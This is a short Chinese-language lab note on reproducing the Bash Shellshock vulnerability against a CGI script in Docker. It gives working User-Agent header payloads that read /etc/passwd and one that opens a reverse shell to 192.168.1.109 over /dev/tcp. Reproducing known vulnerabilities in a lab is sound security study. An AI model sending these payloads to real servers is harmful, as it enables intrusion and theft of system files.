bash shellshock

Bash是一个命令处理器，通常运行于文本窗口中，并能执行用户直接输入的命令。Bash还能从文件中读取命令，这样的文件称为脚本。运作的整体流程是，HTTP请求->env环境变量设置函数处理请求头参数->bash对处理后的结果进行eval代码执行->bash将执行后的结果保留在HTTP的环境变量参数中->bashCGI 向客户端返回数据包时将环境参数一并返回

思路

由于bash使用的环境变量是通过函数名称来调用的，所以用“(){”开头定义的环境变量在命令ENV中解析成函数后，Bash执行并未退出，而是继续解析并执行shell命令，如果我们在后面拼接恶意代码，就会执行。对于CGI脚本来说，HTTP协议中的“key-value”都会变为shell中的“环境变量=值”。

漏洞复现

docker部署环境，完成后访问victim.cgi

抓包修改User-Agent

User-Agent:  () { :; }; echo; /bin/cat /etc/passwd
			 () { :; }; echo; echo $( /bin/cat /etc/passwd)

部署环境尽量在虚拟机，在服务器上好多地方会出问题

反弹shell

User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.1.109/1234 0>&1;